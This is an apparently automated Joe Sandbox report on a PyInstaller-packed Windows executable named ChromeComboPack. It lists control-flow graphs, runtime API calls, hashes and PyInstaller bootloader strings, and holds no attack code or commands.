                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLastMessage$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 4208240515-3165540532
                                                                                                                                                                                                                                                • Opcode ID: 6cf3c8642f53b43b1e9fef10f104943b82e9411ccff8eb65c880d58da3f350d3
                                                                                                                                                                                                                                                • Instruction ID: a9c4c409a35f1408659a70c3b619daecdd831d71643b7cbfcdaa9ef5ad2adbc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cf3c8642f53b43b1e9fef10f104943b82e9411ccff8eb65c880d58da3f350d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9D18432A08BD296EB10AF74E8582BDB764FF84B58FA00275DA5D53A99DF3CD144C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 507 7ff78c9d6e10-7ff78c9d6e4b call 7ff78c9d6798 call 7ff78c9d67a0 call 7ff78c9d6808 514 7ff78c9d7075-7ff78c9d70c1 call 7ff78c9cb7e4 call 7ff78c9d6798 call 7ff78c9d67a0 call 7ff78c9d6808 507->514 515 7ff78c9d6e51-7ff78c9d6e5c call 7ff78c9d67a8 507->515 541 7ff78c9d71ff-7ff78c9d726d call 7ff78c9cb7e4 call 7ff78c9d2788 514->541 542 7ff78c9d70c7-7ff78c9d70d2 call 7ff78c9d67a8 514->542 515->514 521 7ff78c9d6e62-7ff78c9d6e6c 515->521 523 7ff78c9d6e8e-7ff78c9d6e92 521->523 524 7ff78c9d6e6e-7ff78c9d6e71 521->524 525 7ff78c9d6e95-7ff78c9d6e9d 523->525 527 7ff78c9d6e74-7ff78c9d6e7f 524->527 525->525 528 7ff78c9d6e9f-7ff78c9d6eb2 call 7ff78c9ce664 525->528 530 7ff78c9d6e81-7ff78c9d6e88 527->530 531 7ff78c9d6e8a-7ff78c9d6e8c 527->531 537 7ff78c9d6eb4-7ff78c9d6eb6 call 7ff78c9cb404 528->537 538 7ff78c9d6eca-7ff78c9d6ed6 call 7ff78c9cb404 528->538 530->527 530->531 531->523 532 7ff78c9d6ebb-7ff78c9d6ec9 531->532 537->532 548 7ff78c9d6edd-7ff78c9d6ee5 538->548 559 7ff78c9d726f-7ff78c9d7276 541->559 560 7ff78c9d727b-7ff78c9d727e 541->560 542->541 550 7ff78c9d70d8-7ff78c9d70e3 call 7ff78c9d67d8 542->550 548->548 551 7ff78c9d6ee7-7ff78c9d6ef8 call 7ff78c9d1684 548->551 550->541 561 7ff78c9d70e9-7ff78c9d710c call 7ff78c9cb404 GetTimeZoneInformation 550->561 551->514 562 7ff78c9d6efe-7ff78c9d6f54 call 7ff78c9db6e0 * 4 call 7ff78c9d6d2c 551->562 564 7ff78c9d730b-7ff78c9d730e 559->564 565 7ff78c9d72b5-7ff78c9d72c8 call 7ff78c9ce664 560->565 566 7ff78c9d7280 560->566 573 7ff78c9d71d4-7ff78c9d71fe call 7ff78c9d6790 call 7ff78c9d6780 call 7ff78c9d6788 561->573 574 7ff78c9d7112-7ff78c9d7133 561->574 619 7ff78c9d6f56-7ff78c9d6f5a 562->619 569 7ff78c9d7283 564->569 570 7ff78c9d7314-7ff78c9d731c call 7ff78c9d6e10 564->570 586 7ff78c9d72d3-7ff78c9d72ee call 7ff78c9d2788 565->586 587 7ff78c9d72ca 565->587 566->569 576 7ff78c9d7288-7ff78c9d72b4 call 7ff78c9cb404 call 7ff78c9bbab0 569->576 577 7ff78c9d7283 call 7ff78c9d708c 569->577 570->576 580 7ff78c9d7135-7ff78c9d713b 574->580 581 7ff78c9d713e-7ff78c9d7145 574->581 577->576 580->581 588 7ff78c9d7147-7ff78c9d714f 581->588 589 7ff78c9d7159 581->589 602 7ff78c9d72f5-7ff78c9d7307 call 7ff78c9cb404 586->602 603 7ff78c9d72f0-7ff78c9d72f3 586->603 593 7ff78c9d72cc-7ff78c9d72d1 call 7ff78c9cb404 587->593 588->589 596 7ff78c9d7151-7ff78c9d7157 588->596 599 7ff78c9d715b-7ff78c9d71cf call 7ff78c9db6e0 * 4 call 7ff78c9d3d6c call 7ff78c9d7324 * 2 589->599 593->566 596->599 599->573 602->564 603->593 621 7ff78c9d6f60-7ff78c9d6f64 619->621 622 7ff78c9d6f5c 619->622 621->619 624 7ff78c9d6f66-7ff78c9d6f8b call 7ff78c9c7ab8 621->624 622->621 630 7ff78c9d6f8e-7ff78c9d6f92 624->630 632 7ff78c9d6f94-7ff78c9d6f9f 630->632 633 7ff78c9d6fa1-7ff78c9d6fa5 630->633 632->633 635 7ff78c9d6fa7-7ff78c9d6fab 632->635 633->630 638 7ff78c9d702c-7ff78c9d7030 635->638 639 7ff78c9d6fad-7ff78c9d6fd5 call 7ff78c9c7ab8 635->639 640 7ff78c9d7032-7ff78c9d7034 638->640 641 7ff78c9d7037-7ff78c9d7044 638->641 647 7ff78c9d6ff3-7ff78c9d6ff7 639->647 648 7ff78c9d6fd7 639->648 640->641 643 7ff78c9d7046-7ff78c9d705c call 7ff78c9d6d2c 641->643 644 7ff78c9d705f-7ff78c9d706e call 7ff78c9d6790 call 7ff78c9d6780 641->644 643->644 644->514 647->638 653 7ff78c9d6ff9-7ff78c9d7017 call 7ff78c9c7ab8 647->653 651 7ff78c9d6fda-7ff78c9d6fe1 648->651 651->647 654 7ff78c9d6fe3-7ff78c9d6ff1 651->654 659 7ff78c9d7023-7ff78c9d702a 653->659 654->647 654->651 659->638 660 7ff78c9d7019-7ff78c9d701d 659->660 660->638 661 7ff78c9d701f 660->661 661->659
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D6E55
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9D67A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9D67BC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: RtlFreeHeap.NTDLL(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB41A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: GetLastError.KERNEL32(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB424
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB7E4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF78C9CB7C3,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CB7ED
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB7E4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF78C9CB7C3,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CB812
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D6E44
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9D6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9D681C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70BA
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70CB
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70DC
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78C9D731C), ref: 00007FF78C9D7103
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                • Opcode ID: 894310a77b3b939ef206867b0adab4477506e1b9d981cd9488086050b66edecf
                                                                                                                                                                                                                                                • Instruction ID: 3085ef40f773bcba77ff8d25ed61df6892b6bad9b1b7aaf56b2454958f349e7a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 894310a77b3b939ef206867b0adab4477506e1b9d981cd9488086050b66edecf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07D1E426A182C286EB20FF25D8491B9E7A1FF44B94FE08575EB0D57A89DF3CE441C760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 721 7ff78c9d7b74-7ff78c9d7be7 call 7ff78c9d78a8 724 7ff78c9d7c01-7ff78c9d7c0b call 7ff78c9c93fc 721->724 725 7ff78c9d7be9-7ff78c9d7bf2 call 7ff78c9c5dc8 721->725 731 7ff78c9d7c26-7ff78c9d7c8f CreateFileW 724->731 732 7ff78c9d7c0d-7ff78c9d7c24 call 7ff78c9c5dc8 call 7ff78c9c5de8 724->732 730 7ff78c9d7bf5-7ff78c9d7bfc call 7ff78c9c5de8 725->730 747 7ff78c9d7f42-7ff78c9d7f62 730->747 733 7ff78c9d7c91-7ff78c9d7c97 731->733 734 7ff78c9d7d0c-7ff78c9d7d17 GetFileType 731->734 732->730 737 7ff78c9d7cd9-7ff78c9d7d07 GetLastError call 7ff78c9c5d5c 733->737 738 7ff78c9d7c99-7ff78c9d7c9d 733->738 740 7ff78c9d7d19-7ff78c9d7d54 GetLastError call 7ff78c9c5d5c CloseHandle 734->740 741 7ff78c9d7d6a-7ff78c9d7d71 734->741 737->730 738->737 745 7ff78c9d7c9f-7ff78c9d7cd7 CreateFileW 738->745 740->730 756 7ff78c9d7d5a-7ff78c9d7d65 call 7ff78c9c5de8 740->756 743 7ff78c9d7d73-7ff78c9d7d77 741->743 744 7ff78c9d7d79-7ff78c9d7d7c 741->744 751 7ff78c9d7d82-7ff78c9d7dd7 call 7ff78c9c9314 743->751 744->751 752 7ff78c9d7d7e 744->752 745->734 745->737 759 7ff78c9d7df6-7ff78c9d7e27 call 7ff78c9d7628 751->759 760 7ff78c9d7dd9-7ff78c9d7de5 call 7ff78c9d7ab0 751->760 752->751 756->730 766 7ff78c9d7e2d-7ff78c9d7e6f 759->766 767 7ff78c9d7e29-7ff78c9d7e2b 759->767 760->759 768 7ff78c9d7de7 760->768 770 7ff78c9d7e91-7ff78c9d7e9c 766->770 771 7ff78c9d7e71-7ff78c9d7e75 766->771 769 7ff78c9d7de9-7ff78c9d7df1 call 7ff78c9cb968 767->769 768->769 769->747 773 7ff78c9d7f40 770->773 774 7ff78c9d7ea2-7ff78c9d7ea6 770->774 771->770 772 7ff78c9d7e77-7ff78c9d7e8c 771->772 772->770 773->747 774->773 776 7ff78c9d7eac-7ff78c9d7ef1 CloseHandle CreateFileW 774->776 778 7ff78c9d7ef3-7ff78c9d7f21 GetLastError call 7ff78c9c5d5c call 7ff78c9c953c 776->778 779 7ff78c9d7f26-7ff78c9d7f3b 776->779 778->779 779->773
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: 6900b12a6c6c443aa41c68e268e6275e38d412fb7e8bb922b7a0c5fbdd2459d5
                                                                                                                                                                                                                                                • Instruction ID: 7749b8a128cd68427c4b8a44220b0c0c1b55cacb5393b15c343e6020d3d19376
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6900b12a6c6c443aa41c68e268e6275e38d412fb7e8bb922b7a0c5fbdd2459d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDC1D437B18A8185EB10DF68D4885BC7761FB49BA8BA15275DF1E67798CF38D051C320

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 343af2bfc0ab8bb2bc733d9f2e0ab65458cb9c59f463d288286f5b9e53df958b
                                                                                                                                                                                                                                                • Instruction ID: a3e682c14e6fe9718b7699daa317cdd278661865472343f71c4d38fef5222dd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 343af2bfc0ab8bb2bc733d9f2e0ab65458cb9c59f463d288286f5b9e53df958b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A415321A0C6D2E5EA30BB64E4481B9A3A4FB94754FE046B2D69E426D8DF3CD546C730

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1042 7ff78c9d708c-7ff78c9d70c1 call 7ff78c9d6798 call 7ff78c9d67a0 call 7ff78c9d6808 1049 7ff78c9d71ff-7ff78c9d726d call 7ff78c9cb7e4 call 7ff78c9d2788 1042->1049 1050 7ff78c9d70c7-7ff78c9d70d2 call 7ff78c9d67a8 1042->1050 1061 7ff78c9d726f-7ff78c9d7276 1049->1061 1062 7ff78c9d727b-7ff78c9d727e 1049->1062 1050->1049 1055 7ff78c9d70d8-7ff78c9d70e3 call 7ff78c9d67d8 1050->1055 1055->1049 1063 7ff78c9d70e9-7ff78c9d710c call 7ff78c9cb404 GetTimeZoneInformation 1055->1063 1064 7ff78c9d730b-7ff78c9d730e 1061->1064 1065 7ff78c9d72b5-7ff78c9d72c8 call 7ff78c9ce664 1062->1065 1066 7ff78c9d7280 1062->1066 1072 7ff78c9d71d4-7ff78c9d71fe call 7ff78c9d6790 call 7ff78c9d6780 call 7ff78c9d6788 1063->1072 1073 7ff78c9d7112-7ff78c9d7133 1063->1073 1068 7ff78c9d7283 1064->1068 1069 7ff78c9d7314-7ff78c9d731c call 7ff78c9d6e10 1064->1069 1083 7ff78c9d72d3-7ff78c9d72ee call 7ff78c9d2788 1065->1083 1084 7ff78c9d72ca 1065->1084 1066->1068 1074 7ff78c9d7288-7ff78c9d72b4 call 7ff78c9cb404 call 7ff78c9bbab0 1068->1074 1075 7ff78c9d7283 call 7ff78c9d708c 1068->1075 1069->1074 1078 7ff78c9d7135-7ff78c9d713b 1073->1078 1079 7ff78c9d713e-7ff78c9d7145 1073->1079 1075->1074 1078->1079 1085 7ff78c9d7147-7ff78c9d714f 1079->1085 1086 7ff78c9d7159 1079->1086 1097 7ff78c9d72f5-7ff78c9d7307 call 7ff78c9cb404 1083->1097 1098 7ff78c9d72f0-7ff78c9d72f3 1083->1098 1089 7ff78c9d72cc-7ff78c9d72d1 call 7ff78c9cb404 1084->1089 1085->1086 1092 7ff78c9d7151-7ff78c9d7157 1085->1092 1094 7ff78c9d715b-7ff78c9d71cf call 7ff78c9db6e0 * 4 call 7ff78c9d3d6c call 7ff78c9d7324 * 2 1086->1094 1089->1066 1092->1094 1094->1072 1097->1064 1098->1089
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70BA
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9D6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9D681C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70CB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9D67A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9D67BC
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF78C9D70DC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9D67D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9D67EC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: RtlFreeHeap.NTDLL(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB41A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9CB404: GetLastError.KERNEL32(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB424
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78C9D731C), ref: 00007FF78C9D7103
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                • Opcode ID: 366357b761470030cfef413778487e18a877c09c25dbeb354349ed8e19cf56e7
                                                                                                                                                                                                                                                • Instruction ID: fca1168d8bd4016429684648b88cbaa31fb88a4194515de9499bb144d554acdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 366357b761470030cfef413778487e18a877c09c25dbeb354349ed8e19cf56e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE519332A186C286E720FF25E8891A9F7A4BB48784FE04575EB0D53A99DF3CE441C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: bf04df12ed89424385b35bc97b9e30209b4e9d30cb3ee9ccc1531a0517fd62e7
                                                                                                                                                                                                                                                • Instruction ID: 8a80b6c4fad64939f7023042922389b7aeaf71462f1c07406820bd93b2dc34a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf04df12ed89424385b35bc97b9e30209b4e9d30cb3ee9ccc1531a0517fd62e7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F04F27A1868286F7A09B60F499766B390BB84764FA44379DA7E02AD4DF3CD009CB14
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                • API String ID: 2776309574-3325264605
                                                                                                                                                                                                                                                • Opcode ID: 8be18c92a23c61f25da1e1e9a1bd1b3a6f47e4c63f5c4fe1cc962124ee15b200
                                                                                                                                                                                                                                                • Instruction ID: 89feafbec24386c36aea629e93fad92dd747655fb3869aacd60c65adfac1e78f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8be18c92a23c61f25da1e1e9a1bd1b3a6f47e4c63f5c4fe1cc962124ee15b200
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D428021A0CAE2A1FB25FB20D4582F9E695BF54780FE440B2DA5E426D6EF2CF545C330

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
